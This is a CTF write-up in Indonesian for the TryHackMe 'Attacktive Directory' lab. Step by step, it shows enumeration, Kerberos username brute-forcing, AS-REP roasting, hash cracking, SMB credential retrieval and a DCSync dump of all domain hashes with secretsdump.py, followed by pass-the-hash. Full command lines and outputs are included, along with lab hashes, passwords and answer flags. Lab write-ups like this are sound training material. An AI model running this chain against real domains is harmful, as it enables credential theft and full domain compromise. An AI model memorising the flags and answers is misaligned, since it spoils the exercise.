🛠️Tools yang digunakan
- Impacket (GetNPUsers.py, secretsdump.py)
- Hashcat
- John
Welcome to Attacktive Directory
Kita perlu melakukan enumerasi untuk memetakan ports dan services yang digunakan oleh jaringan Active Directory menggunakan nmap dan enum4linux.
nmap
nmap <TARGET IP ADDRESS> -p- -sVC -T3
Starting Nmap 7.80 ( https://nmap.org ) at 2026-03-11 21:41 GMT
mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.49.133.227
Host is up (0.00037s latency).
Not shown: 65508 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-11 21:47:39Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| DNS_Tree_Name: spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2026-03-11T21:49:55+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2026-03-10T21:33:19
|_Not valid after: 2026-09-09T21:33:19
|_ssl-date: 2026-03-11T21:50:09+00:00; -1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49672/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49673/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49691/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
49857/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/11%Time=69B1E300%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-03-11T21:49:56
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 495.79 secondsenum4linux
enum4linux-ng -A <TARGET IP ADDRESS> -oA results.txt
ENUM4LINUX - next generation (v1.3.4)
==========================
| Target Information |
==========================
[*] Target ........... 10.49.133.227
[*] Username ......... ''
[*] Random Username .. 'qclcuszt'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
======================================
| Listener Scan on 10.49.133.227 |
======================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
=====================================================
| Domain Information via LDAP for 10.49.133.227 |
=====================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: spookysec.local
============================================================
| NetBIOS Names and Workgroup/Domain for 10.49.133.227 |
============================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out
==========================================
| SMB Dialect Check on 10.49.133.227 |
==========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: false
SMB 2.02: true
SMB 2.1: true
SMB 3.0: true
SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: true
============================================================
| Domain Information via SMB session for 10.49.133.227 |
============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: ATTACKTIVEDIREC
NetBIOS domain name: THM-AD
DNS domain: spookysec.local
FQDN: AttacktiveDirectory.spookysec.local
Derived membership: domain member
Derived domain: THM-AD
==========================================
| RPC Session Check on 10.49.133.227 |
==========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE
====================================================
| Domain Information via RPC for 10.49.133.227 |
====================================================
[+] Domain: THM-AD
[+] Domain SID: S-1-5-21-3591857110-2884097990-301047963
[+] Membership: domain member
================================================
| OS Information via RPC for 10.49.133.227 |
================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 10, Windows Server 2019, Windows Server 2016
OS version: '10.0'
OS release: '1809'
OS build: '17763'
Native OS: not supported
Native LAN manager: not supported
Platform id: null
Server type: null
Server type string: null
======================================
| Users via RPC on 10.49.133.227 |
======================================
[*] Enumerating users via 'querydispinfo'
[-] Could not find users via 'querydispinfo': STATUS_ACCESS_DENIED
[*] Enumerating users via 'enumdomusers'
[-] Could not find users via 'enumdomusers': STATUS_ACCESS_DENIED
=======================================
| Groups via RPC on 10.49.133.227 |
=======================================
[*] Enumerating local groups
[-] Could not get groups via 'enumalsgroups domain': STATUS_ACCESS_DENIED
[*] Enumerating builtin groups
[-] Could not get groups via 'enumalsgroups builtin': STATUS_ACCESS_DENIED
[*] Enumerating domain groups
[-] Could not get groups via 'enumdomgroups': STATUS_ACCESS_DENIED
=======================================
| Shares via RPC on 10.49.133.227 |
=======================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user
==========================================
| Policies via RPC for 10.49.133.227 |
==========================================
[*] Trying port 445/tcp
[-] SMB connection error on port 445/tcp: STATUS_ACCESS_DENIED
[*] Trying port 139/tcp
[-] SMB connection error on port 139/tcp: session failed
==========================================
| Printers via RPC for 10.49.133.227 |
==========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED
Completed after 6.22 secondsWhat tool will allow us to enumerate port 139/445?
Kita dapat menggunakan nmap atau enum4linux-ng untuk melakukan scanning kedua port tersebut tetapi jawaban yang valid adalah
- enum4linux
What is the NetBIOS-Domain Name of the machine?
- THM-AD
What invalid TLD do people commonly use for their Active Directory Domain?
- .local
Enumerating Users via Kerberos
Menggunakan kerbrute untuk melakukan enumerasi terhadap user yang valid dari wordlist yang sudah disediakan.
https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
kerbrute --dc <TARGET IP ADDRESS> -d THM-AD userlist.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 03/11/26 - Ronnie Flathers @ropnop
2026/03/11 22:25:46 > Using KDC(s):
2026/03/11 22:25:46 > 10.49.133.227:88
2026/03/11 22:25:46 > [+] VALID USERNAME: james@THM-AD
2026/03/11 22:25:46 > [+] VALID USERNAME: svc-admin@THM-AD
2026/03/11 22:25:46 > [+] VALID USERNAME: James@THM-AD
2026/03/11 22:25:47 > [+] VALID USERNAME: robin@THM-AD
2026/03/11 22:25:47 > [+] VALID USERNAME: darkstar@THM-AD
2026/03/11 22:25:47 > [+] VALID USERNAME: administrator@THM-AD
2026/03/11 22:25:47 > [+] VALID USERNAME: backup@THM-AD
2026/03/11 22:25:47 > [+] VALID USERNAME: paradox@THM-AD
2026/03/11 22:25:48 > [+] VALID USERNAME: JAMES@THM-AD
2026/03/11 22:25:48 > [+] VALID USERNAME: Robin@THM-AD
2026/03/11 22:25:50 > [+] VALID USERNAME: Administrator@THM-AD
2026/03/11 22:25:53 > [+] VALID USERNAME: Darkstar@THM-AD
2026/03/11 22:25:55 > [+] VALID USERNAME: Paradox@THM-AD
2026/03/11 22:25:58 > [+] VALID USERNAME: DARKSTAR@THM-AD
2026/03/11 22:25:59 > [+] VALID USERNAME: ori@THM-AD
2026/03/11 22:26:01 > [+] VALID USERNAME: ROBIN@THM-AD
2026/03/11 22:26:07 > Done! Tested 73317 usernames (16 valid) in 20.502 secondsWhat command within Kerbrute will allow us to enumerate valid usernames?
Kita bisa menggunakan command --help setelah kerbrute untuk melihat bantuan flags yang disediakan oleh kerbrute.
- userenum
What notable account is discovered? (These should jump out at you)
Terdapat hal yang menarik perhatian pertama kali dibagian atas output kerbrute.
- svc-admin
What is the other notable account is discovered? (These should jump out at you)
Terdapat hal yang menarik perhatian lainnya pada hasil output kerbrute.
backup
Abusing Kerberos
Kita akan memanfaatkan salah satu fitur Kerberos untuk menggunakan teknik penyerang yang disebut ASREPRoasting.ASReproasting terjadi ketika akn user dengan sebuah privilege "Does not require Pre-Authentication.Artinya akun tersebut tidak perlu menyediakan identifikasi valid sebelum melakukan request tiket Kerberos pada akun spesifik.Kita akan mencoba mendapatkan Kerberos Tickets menggunakan tools GetNPUsers.py berdasarkan 2 users yang cukup menarik tadi, kemudian kita akan mengcrack hash tersebut menggunakan hashcat atau johntheripper untuk mendapatkan password dari hash user tersebut.
We have two users accounts that we could pottentially query a ticket from.Which user account can you query a ticker from with no password?
- svc-admin
Pada percobaan terhadap user backup, user tersebut tidak memiliki Pre-Authentication set.
python3.9 /opt/impacket/examples/GetNPUsers.py THM-AD/backup -dc-ip <TARGET IP ADDRESS> -no-pass
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[*] Getting TGT for backup
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH setKemudian kita mencoba ke user svc-admin dan mendapatkan hash user tersebut
python3.9 /opt/impacket/examples/GetNPUsers.py THM-AD/svc-admin -dc-ip <TARGET IP ADDRESS> -no-pass
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@THM-AD:823ce2010c7e8ed918c01cab7a774803$b883706471b5fffffb39e0a1be2229664cd9776eacb89e89a89ee65b34d5db0f8c29fd01e0fbaf41f9a955f7220eec5c6f78a819895c9fd9826ebd01c790dc55c7ec4850e470b9674487da3adbb61c9f56826af25e48fdbcb9a4a6804d14c8e6ac1b3d3f45d22fdbf7633fd60d8a9ddeac0b36d93eefe77abb23ed016a4b15b7db1be75cd172570da9da0d4a5c8a32d865208b70abe72ba2637908e0a6948fde9fd19a210231c2fbaa5182d3c3ed00fc74dcb9c2f86fc3f37eed7ea972dc8adf1042110f32d8ba3a4581c855064d08ae0195f924e8bd723cba76d3038812a1d54d610a9d2e3a68049aLooking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
- Kerberos 5, etype 23, AS-REP
Mengikuti panduan dari Hashcat Example Wiki page (https://hashcat.net/wiki/doku.php?id=example_hashes), kita perlu mencari nama lengkap dari hash yang didapatkan dari KDC.
What mode is the hash?
- 18200
Mengikuti panduan dari Hashcat Example Wiki page (https://hashcat.net/wiki/doku.php?id=example_hashes), kita perlu mencari mode hash dari hash yang didapatkan dari KDC.
Now crack the hash with the modified password list provided, what is the user accounts password?
- management2005
Menggunakan hashcat atau john kita akan melakukan cracking password dari Hash Kerberos 5, etype 23, AS-REP dengan mode 18200.
Hashcat
hashcat -m 18200 -a hash.txt ~/passwordlist.txt hash.txtJohn
john --wordlist=~/passwordlist.txt --rules hash.txtBack to the Basics
Setelah mendapatkan kredensial akun user kita sekarang memiliki akses lebih banyak pada domain controller.Kita bisa mencoba untuk mengenumerasi shares yang mungkin berada di domain controller.
What utility can we use to map remote SMB shares?
- smbclient
Tools yang paling umum untuk terhubung ke SMB shares adalah smbclient.
Which option will list shares?
- -L
Untuk melihat argument yang bisa digunakan pada smbclient kita bisa menggunakan argument --help .
How many remote shares is the server listing?
- 6
Menggunakan kredensial yang sudah kita dapatkan dan argument untuk melihat list shares kita dapat menemukan 6 shares yang dimiliki oleh user svc-admin.
smbclient -L //<TARGET IP ADDRESS> -U svc-admin%management200
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup availableThere is one particular share that we have access to that contains a text file. Which share is it?
- backup
What is the content of the file?
- YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
Mencoba masuk ke dalam share dan mengambil file yang berada dalam share backup dan file tersebut berisi sebuah encoding.
smbclient //<TARGET IP ADDRESS>/backup -U svc-admin%management200
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Apr 4 20:08:39 2020
.. D 0 Sat Apr 4 20:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 20:08:53 2020
8247551 blocks of size 4096. 4375569 blocks available
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (6.7 KiloBytes/sec) (average 6.7 KiloBytes/sec)
smb: \> exit
cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYwDecoding the contents of the file, what is the full contents?
- backup@spookysec.local:backup2517860
Kita dapat langsung melakukan decoding pada command line menggunakan base64 diikuti argument -d untuk decoding.
cat backup_credentials.txt | base64 -d
backup@spookysec.local:backup2517860Elevating Privileges within the Domain
Kita menemukan akun backup untuk Domain Controller.Akun tersebut memiliki izin unik yang memungkinkan semua Active Directory sinkron dengan akun pengguna saat ini.Dengan mengetahui hal tersebut, kita akan menggunakan tools dalam impackter yang bernama "secretsdump.py".Tools tersebut akan mengambil semua hashes password yang akun user (yang sudah sinkron dengan domain controller) tersebut tawarkan.Dengan mengeksploitasi hal tersebut kita akan memiliki kontrol penuh atas AD Domain.
What method allowed us to dump NTDS.DIT?
- DRSUAPI
Menjalankan secretsdump.py dan melihat method yang digunakan pada NTDS.DIT pada output.
python3 secretsdump.py THM-AD/backup:backup2517860@<TARGET IP ADDRESS> -dc-ip <TARGET IP ADDRESS>
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:4355622f195fd8ee38886a202c50e763:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
Administrator:des-cbc-md5:2079ce0e5df189ad
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233
spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f
spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5
spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425
spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064
spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112
spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6
spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9
spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe
spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510
spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054
spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd
spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e
spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594
spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499
spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be
spookysec.local\darkstar:des-cbc-md5:758af4d061381cea
spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067
spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e
spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a
spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3
spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8
spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64
spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0
spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8
spookysec.local\paradox:des-cbc-md5:83988983f8b34019
spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347
spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa
spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86
spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166
spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c
spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157
spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518
spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff
spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d
spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922
spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197
spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89
spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242
spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68
spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9
ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:cbfd2e4db3070240105488df29d951e41c8a2d31e8e196cd51e2f37d6cb2de48
ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:e6aa9640812ea17abdb509278ebe14b2
ATTACKTIVEDIREC$:des-cbc-md5:02a445b3522fb094
[*] Cleaning up...What is the Administrators NTLM hash?
- 0e0363213e37b94221497260b0bcb4fc
What method of attack could allow us to authenticate as the user without the password?
- Pass The Hash
Pada protokol NTLM kita bisa login tanpa perlu mengetahui password dari user tersebut dan hanya menggunakan Hash Password dari user tersebut, metode ini dinamakan Pass The Hash.
Using a tool called Evil-WinRM what option will allow us to use a hash?
- -H
Login sebagai Administrator dan hash password dari Administrator argument yang disertakan untuk hash password menggunakan tool evil-winrm adalah -H yang dapat dilihat menggunakan argument --help .
Flag Submission Panel
Menggunakan kredensial yang sudah kita dapatkan selama proses enumerasi, eksploitasi, dan privilege escalation kita dapat mengumpulkan semua flag dari setiap user.
svc-admin
- TryHackMe{K3rb3r0s_Pr3_4uth}
backup
- TryHackMe{B4ckM3UpSc0tty!}
Administrator
- TryHackMe{4ctiveD1rectoryM4st3r}